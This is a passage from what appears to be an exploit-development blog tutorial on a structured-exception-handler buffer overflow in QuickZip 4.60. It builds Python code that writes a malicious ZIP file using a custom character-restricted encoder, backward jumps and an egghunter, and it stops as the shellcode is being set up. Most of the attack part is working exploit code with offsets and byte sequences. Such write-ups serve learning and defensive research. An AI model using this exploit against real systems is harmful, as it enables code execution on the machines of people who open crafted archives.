Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev&quot;</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;.txt&quot;</span>
</span><span class='line'>
</span><span class='line'><span class="k">print</span> <span class="s">&quot;[+] Length = &quot;</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">))</span>
</span><span class='line'>
</span><span class='line'><span class="n">exploit</span> <span class="o">=</span> <span class="n">header_1</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="n">header_2</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="n">header_3</span>
</span><span class='line'>
</span><span class='line'><span class="n">mefile</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">&#39;cst.zip&#39;</span><span class="p">,</span><span class="s">&#39;w&#39;</span><span class="p">);</span>
</span><span class='line'><span class="n">mefile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">exploit</span><span class="p">);</span>
</span><span class='line'><span class="n">mefile</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span><span class='line'>
</span><span class='line'><span class="k">print</span> <span class="s">&quot;[+] Exploit complete!&quot;</span>
</span></code></pre></td></tr></table></div></figure>


<p>And that&rsquo;s how it looks after execution:</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/21.written%20instructions.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/21.written%20instructions.png" alt="image" /></a></p>

<p>Fantastic, we have successfully written code that we want using only valid characters! All that&rsquo;s left to do now is to jump back to that area to get it executed. We&rsquo;ll also need to change our temporary <code>0xDEADBEEF</code> address that we have written to the actual offset once we know what it is&hellip; but that&rsquo;s at the end.</p>

<h2>Jumping around</h2>

<p>Unfortunately we don&rsquo;t have much space to jump around. Only <strong>5</strong> bytes after our custom encoder code and <strong>4</strong> bytes before the encoder code. We need to come up with instructions that will get us to the code we have just written.</p>

<p>Turns out, there&rsquo;s actually not much that we can do due to the character restriction. Any short backward jumps contain invalid characters and don&rsquo;t get us where we need to be. Also, if we were to reuse the jump we took before&hellip; hang on&hellip; the jump we used before&hellip;. hmmmm.</p>

<p>Have a look at the payload we currently have.</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/21.written%20instructions.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/21.written%20instructions.png" alt="image" /></a></p>

<p>We need to get creative. Let&rsquo;s reuse the <code>JNO</code> jump back we already have in our SEH to put us back again in the area we control. At the very beginning of the encoder payload that we currently have, we&rsquo;ll add some NOPs that will be then overwritten with another jump back instruction by our custom encoder to put us before the code we have just recently written.</p>

<p>Phew, hope it makes sense? Let me explain.</p>

<p>The jump we&rsquo;ll need to use will be simply <code>JMP $-16</code> (<code>\xeb\xee</code>), unfortunately it contains invalid characters and it won&rsquo;t work for us&hellip;. any jump with valid characters will put us too far &lsquo;up&rsquo;.</p>

<p>However! We can write it using the encoder we already have, exactly the same way we&rsquo;ve done it for putting address of egghunter to <code>EAX</code> - we&rsquo;ll just need to adjust our offsets and modify code a little bit.</p>

<p>First of all, instead of those few NOPs that we were writing using our encoder, we&rsquo;ll add our <code>JMP</code> instruction. Secondly, we&rsquo;ll need to modify our initial stack adjustment to land exactly where the SEH jump will initialy take us. Lastly, we&rsquo;ll add some NOPs that will be overwritten at the very beginning of the encoder. A lot to take in, but let&rsquo;s see how it works in action - hopefully it&rsquo;ll be clearer.</p>

<p>Let&rsquo;s start with NOPs before our custom encoder. Since we need to use valid character set, we can use <code>\x41\x41</code> (<code>INC ECX</code>) as our NOPs.</p>

<p>Next, stack adjustment. Looking at current state, it appears that we&rsquo;ll need to offset it <strong>6</strong> bytes further to start writing into the area we want to overwrite. Let&rsquo;s make that change as well.</p>

<p>Lastly, we&rsquo;ll need to write the <code>JNZ $-16</code> (<code>\x75\xee</code>) instruction with our encoder. Let&rsquo;s just replace last two <code>\x90</code> with the new instruction (remembering about little-endianness and that we need to write it in reverse).</p>

<p>Putting it all together, the changes should look like this:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
<span class='line-number'>38</span>
<span class='line-number'>39</span>
<span class='line-number'>40</span>
<span class='line-number'>41</span>
<span class='line-number'>42</span>
<span class='line-number'>43</span>
<span class='line-number'>44</span>
<span class='line-number'>45</span>
<span class='line-number'>46</span>
<span class='line-number'>47</span>
<span class='line-number'>48</span>
<span class='line-number'>49</span>
<span class='line-number'>50</span>
<span class='line-number'>51</span>
<span class='line-number'>52</span>
<span class='line-number'>53</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="c">#...snip...</span>
</span><span class='line'>
</span><span class='line'><span class="n">nseh_offset</span> <span class="o">=</span> <span class="mi">292</span>
</span><span class='line'><span class="n">jump_offset</span> <span class="o">=</span> <span class="mi">92</span>
</span><span class='line'>
</span><span class='line'><span class="c">#...snip...</span>
</span><span class='line'>
</span><span class='line'><span class="n">payload</span> <span class="o">=</span> <span class="n">egghunter</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">nseh_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="o">-</span> <span class="n">jump_offset</span><span class="p">)</span>    <span class="c"># padding for nSEH</span>
</span><span class='line'>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x41\x41</span><span class="s">&quot;</span>   <span class="c"># INC ECX (acts as NOPs, but using valid character set)</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Offset the stack by 0x632 to start writing to a controlled area of memory</span>
</span><span class='line'><span class="c">#</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x54</span><span class="s">&quot;</span>                   <span class="c"># push esp;</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x58</span><span class="s">&quot;</span>                   <span class="c"># pop eax;</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x33\x07\x01\x01</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x01010733</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x2d\x01\x01\x01\x01</span><span class="s">&quot;</span>   <span class="c"># sub eax, 0x01010101</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x50</span><span class="s">&quot;</span>                   <span class="c"># push eax;</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x5c</span><span class="s">&quot;</span>                   <span class="c"># pop esp;</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Write instructions for: push esp; pop eax; sub eax, 0xDEADBEEF; jmp eax; jnz 0xee</span>
</span><span class='line'><span class="c">#</span>
</span><span class='line'>                                    <span class="c"># Zero-out EAX</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x25\x01\x01\x01\x01</span><span class="s">&quot;</span>   <span class="c"># and eax,0x01010101</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x25\x10\x10\x10\x10</span><span class="s">&quot;</span>   <span class="c"># and eax,0x10101010</span>
</span><span class='line'>                                       <span class="c"># write 0xee7590e0 into EAX  ==&gt;&gt; &#39;0xee75&#39; represents &#39;JNZ $-16&#39; instruction</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x70\x70\x74\x77</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x77747070</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x70\x20\x01\x77</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x77012070</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x50</span><span class="s">&quot;</span>                   <span class="c"># push eax;</span>
</span><span class='line'>                                    <span class="c"># Zero-out EAX</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x25\x01\x01\x01\x01</span><span class="s">&quot;</span>   <span class="c"># and eax,0x01010101</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x25\x10\x10\x10\x10</span><span class="s">&quot;</span>   <span class="c"># and eax,0x10101010</span>
</span><span class='line'>                                       <span class="c"># write 0xffdeadbe into EAX</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x77\x77\x77\x77</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x77777777</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x37\x25\x57\x77</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x77572537</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x10\x11\x10\x11</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x11101110</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x50</span><span class="s">&quot;</span>                   <span class="c"># push eax;</span>
</span><span class='line'>                                    <span class="c"># Zero-out EAX</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x25\x01\x01\x01\x01</span><span class="s">&quot;</span>   <span class="c"># and eax,0x01010101</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x25\x10\x10\x10\x10</span><span class="s">&quot;</span>   <span class="c"># and eax,0x10101010</span>
</span><span class='line'>                                       <span class="c"># write 0xef2d5854 into EAX</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x43\x47\x1c\x77</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x771c4743</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x10\x10\x01\x77</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x77011010</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x05\x01\x01\x10\x01</span><span class="s">&quot;</span>   <span class="c"># add eax, 0x01100101</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x50</span><span class="s">&quot;</span>                   <span class="c"># push eax;</span>
</span><span class='line'>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">nseh_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">))</span>       <span class="c"># padding for the rest of the encoder</span>
</span><span class='line'>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x71\x9b\x70\x9b</span><span class="s">&quot;</span>       <span class="c"># nSEH: jno $-99; jo $-99   =&gt; &#39;9b&#39; will actually be converted to &#39;a2&#39;, which is $-92</span>
</span><span class='line'><span class="n">payload</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x33\x28\x42\x00</span><span class="s">&quot;</span>       <span class="c"># SEH</span>
</span><span class='line'>
</span><span class='line'><span class="c">#...snip...</span>
</span></code></pre></td></tr></table></div></figure>


<p>Once we execute it, the following should happen:</p>

<ol>
<li>Crash is triggered</li>
<li><em>POP-POP-RET</em> instructions are called</li>
<li>Backwards jump <code>JNO $-92</code> is taken</li>
<li>Execution of custom encoder starts</li>
<li>The code will eventually reach <code>JNO</code> instruction from step 3</li>
<li><code>JNO</code> jump is taken again, but this time, the first instruction we land at is the newly written jump back by <strong>16</strong> bytes</li>
<li>Jump is taken</li>
<li>Instructions written using the custom encoder will execute</li>
</ol>


<p>Let&rsquo;s see if that&rsquo;s what really happens.</p>

<ul>
<li><p>After execution of custom encoder: *
<a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/22.jump%20taken%201.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/22.jump%20taken%201.png" alt="image" /></a></p></li>
<li><p><code>JMP</code> is taken *
<a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/23.jump%20taken%202.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/23.jump%20taken%202.png" alt="image" /></a></p></li>
<li><p>Landed before written instructions, ready to execute *
<a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/24.jump%20taken%203.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/24.jump%20taken%203.png" alt="image" /></a></p></li>
</ul>


<p>Awesome, exactly what we expected! Now we just need to figure out what value to replace <code>0xDEADBEEF</code> with and we&rsquo;re pretty much done!</p>

<p>Let&rsquo;s calculate it - current value of <code>ESP</code> is <code>0x0018FB4E</code> and our egghunter code starts at <code>0x0018FA90</code>, this means that we need to offset EAX by <code>0xBE</code> to have <code>EAX</code> pointing where we need it to.</p>

<p>Let&rsquo;s modify our exploit to instead of subtracting <code>0xDEADBEEF</code> from <code>EAX</code>, we&rsquo;ll only take away <code>0xBE</code>. The following changes should be made to the PoC:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
</pre></td><td class='code'><pre><code class=''><span class='line'># Zero-out EAX
</span><span class='line'>payload += "\x25\x01\x01\x01\x01"   # and eax,0x01010101
</span><span class='line'>payload += "\x25\x10\x10\x10\x10"   # and eax,0x10101010
</span><span class='line'>                                       # write 0xff000000 into EAX
</span><span class='line'>payload += "\x05\x01\x01\x01\x77"   # add eax, 0x77010101
</span><span class='line'>payload += "\x05\x01\x01\x01\x77"   # add eax, 0x77010101
</span><span class='line'>payload += "\x05\x10\x10\x10\x22"   # add eax, 0x22101010
</span><span class='line'>payload += "\x2d\x12\x12\x12\x11"   # sub eax, 0x11121212
</span><span class='line'>payload += "\x50"                   # push eax;
</span><span class='line'>                                    # Zero-out EAX
</span><span class='line'>payload += "\x25\x01\x01\x01\x01"   # and eax,0x01010101
</span><span class='line'>payload += "\x25\x10\x10\x10\x10"   # and eax,0x10101010
</span><span class='line'>                                       # write 0xbe2d5854 into EAX
</span><span class='line'>payload += "\x05\x43\x47\x1c\x67"   # add eax, 0x671c4743
</span><span class='line'>payload += "\x05\x11\x11\x11\x57"   # add eax, 0x57111111
</span><span class='line'>payload += "\x50"                   # push eax;</span></code></pre></td></tr></table></div></figure>


<p>Let&rsquo;s run it and see where it gets us.</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/28.beginning%20of%20the%20egghunter.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/28.beginning%20of%20the%20egghunter.png" alt="image" /></a></p>

<p>AWESOME! We landed in our egghunter. Now it should be as easy as inserting shellcode of our choice and letting egghunter find it.</p>

<p>Let&rsquo;s run <code>!mona findmsp</code> just in case to see if our payload is still there in memory&hellip;</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/29.no%20payload.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/29.no%20payload.png" alt="image" /></a></p>

<p>What?! It disappeared! Where did it go? What happened? All that work for nothing????</p>

<p><strong><em> fast-forward a couple of hours </em></strong></p>

<p>Ok, I know what happens. The instruction we added at the very beginning of our custom encoding routine breaks the payload and makes our shellcode disappear. Instruction at fault is <code>POP ESP</code> (<code>\x5c</code>) - the same byte from before that made our filename to be interpreted as a directory!</p>

<p>I spent a lot of time thinking, debugging and trying to come up with an alternative that doesn&rsquo;t break the payload, but with no luck. We simply don&rsquo;t have anything we could use in this case that uses valid character set.</p>

<p>However, there is a solution! Maybe not the prettiest, but there is. Have a look at the following line in our exploit:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="n">exploit</span> <span class="o">=</span> <span class="n">header_1</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="n">header_2</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="n">header_3</span>
</span></code></pre></td></tr></table></div></figure>


<p>What if we add payload once again after the header_3? It&rsquo;ll basically append some garbage at the end of the ZIP file, but it should still work. Let&rsquo;s give it a shot!</p>

<p>Modify the line as follows and open it us with QuickZip.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="n">exploit</span> <span class="o">=</span> <span class="n">header_1</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="n">header_2</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="n">header_3</span> <span class="o">+</span> <span class="n">payload</span>
</span></code></pre></td></tr></table></div></figure>


<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/30.quickzip%20warning.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/30.quickzip%20warning.png" alt="image" /></a></p>

<p>There&rsquo;s a warning displayed that there&rsquo;s some garbage at the end of the file, but that&rsquo;s OK, it appears that we can still successfully open the file.</p>

<p>Let&rsquo;s trigger the crash and see once again if, this time, we can find the pattern in memory.</p>

<p><a href="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/31.%20shellcode%20found%20again.png"><img src="http://blog.knapsy.com/images/posts/2017-05-01-quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/31.%20shellcode%20found%20again.png" alt="image" /></a></p>

<p>Hurray!!! It&rsquo;s there!!! Now it should be all nice and easy.</p>

<h2>Shellcode</h2>

<p>Now we just need to follow the usual process of setting up the payload for shellcode - we need to figure out bad characters, insert an &ldquo;egg&rdquo; (<code>w00tw00t</code>) before the shellcode and align the stack.</p>

<p>I won&rsquo;t go into the details of finding bad characters as I already covered it in details <a href="http://blog.knapsy.com/blog/2015/11/25/easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/">here</a>. Luckily for us, the only bad characters for this part of payload are <code>\x00</code>, <code>\x0a</code> and <code>\x0d</code>.</p>

<p>We also need to insert <code>w00tw00t</code> characters at the very beginning of our shellcode to ensure that the egghunter can locate it and redirect execution to first instructions after the &ldquo;egg&rdquo;.</p>

<p>Lastly, we&rsquo;ll need to align the stack to make sure <code>ESP</code> points to an address which is a multiple of 16 bytes. The reason for this is that there are some &ldquo;<a href="https://en.wikipedia.org/wiki/SIMD">SIMD</a>&rdquo; (Single Instruction, Multiple Data) instructions which can perform parallel operations on multiple words in memory, but require those multiple words to be a block starting at an address which is a multiple of 16 bytes.</p>

<p>If we didn&rsquo;t align the stack properly, the shellcode simply wouldn&rsquo;t work. We can easily align the stack with a single instruction
<code>AND esp,0xFFFFFFF0</code>, which we&rsquo;ll add right behind the <code>w00tw00t</code> egg and before the actual shellcode.</p>

<p>For PoC, we&rsquo;ll use <code>msfvenom</code> to generate a simple, <code>calc</code> popping shellcode. To sum it all up, the shellcode code will look as follows:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="n">shellcode</span> <span class="o">=</span> <span class="s">&quot;w00tw00t&quot;</span>                     <span class="c"># egg</span>
